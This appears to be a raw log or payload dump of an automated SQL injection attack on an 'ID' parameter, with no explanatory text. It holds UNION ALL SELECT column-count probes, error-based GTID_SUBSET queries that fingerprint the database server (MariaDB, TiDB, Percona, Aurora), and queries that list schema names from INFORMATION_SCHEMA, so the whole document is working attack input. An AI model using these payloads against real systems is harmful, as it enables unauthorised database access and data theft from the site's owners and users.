ID:1" UNION ALL SELECT 65,CONCAT(0x717a716271,0x7045634b677748416470,0x71626b6a71),65#
ID:1" UNION ALL SELECT 65,65,CONCAT(0x717a716271,0x746852424a477a71617a,0x71626b6a71)#
ID:1" UNION ALL SELECT CONCAT(0x717a716271,0x6f6443556543414c5878,0x71626b6a71),65,65#
ID:-3093" UNION ALL SELECT 65,65,CONCAT(0x717a716271,0x696b636954474356464a4761474f6a785072534555614974527668524b6c70754b6e76686f6a6a65,0x71626b6a71)#
ID:-1317" UNION ALL SELECT 65,CONCAT(0x717a716271,0x7a6e794a4c6a4555796e4455624e655a4c62674f5a4f56545377596c45457548704d6c6e4c717253,0x71626b6a71),65#
ID:-1168" UNION ALL SELECT CONCAT(0x717a716271,0x786b5546754264514153446e6a725a4368666361466e7541575359676c4261554c47644543445a76,0x71626b6a71),65,65#
ID:-9706" UNION ALL SELECT 65,65,CONCAT(0x717a716271,0x774654616176676a775a,0x71626b6a71)#
ID:-4680" UNION ALL SELECT 65,CONCAT(0x717a716271,0x61596e46694f6b616241,0x71626b6a71),65#
ID:-6187" UNION ALL SELECT CONCAT(0x717a716271,0x4d71787a6b775a78614b,0x71626b6a71),65,65#
ID:-7977" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-8420" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6148" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-9453" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7406" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6051" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-1913" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2875" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6616" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-4487" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2800" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6612" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-1305" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2309" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-9563" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6158" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-3788" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6449" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6034" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-3690" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-8555" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-9489" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5931" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-3708" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5000" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2418" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5015" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2871" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5919" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-1858" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-9980" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-4529" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7566" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-1471" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6906" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6278" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-3397" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7786" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2560" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-3015" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7992" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6060" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2076" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-3652" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7664" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-4396" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6715" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6494" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7389" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5931" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5092" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2275" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2040" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2242" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-4222" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6390" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-9587" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6041" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-9207" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5268" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2246" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2119" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-9988" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-4504" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-1553" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2676" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6491" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7020" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-2611" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5651" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-4744" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-8722" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-6760" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-5986" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7637" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7735" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-1990" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-8533" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-7399" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:-8749" UNION ALL SELECT 65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65,65#
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT (CASE WHEN (5349=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5349) THEN 1 ELSE 0 END)),0x71626b6a71),6496)-- ZEMh
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT REPEAT(0x34,1024)),0x71626b6a71),7417)-- OyXZ
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT REPEAT(0x30,190)),0x71626b6a71),1734)-- ZhEO
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x71626b6a71),8246)-- wwIM
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x71626b6a71),4620)-- orRS
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x71626b6a71),8880)-- TBjH
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x71626b6a71),7547)-- GFeQ
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x71626b6a71),3442)-- fNHP
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71626b6a71),3901)-- NGSp
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x71626b6a71),4345)-- Vkjt
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x71626b6a71),7794)-- rzdx
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x71626b6a71),7701)-- beWe
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x71626b6a71),8215)-- znxw
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x71626b6a71),9010)-- UlNv
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x71626b6a71),5753)-- yLnX
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),0x71626b6a71),4093)-- AuGa
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),0x71626b6a71),2609)-- KwDK
ID:1" AND GTID_SUBSET(CONCAT(0x717a716271,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 8,1),0x71626b6a71),3050)-- Xdet
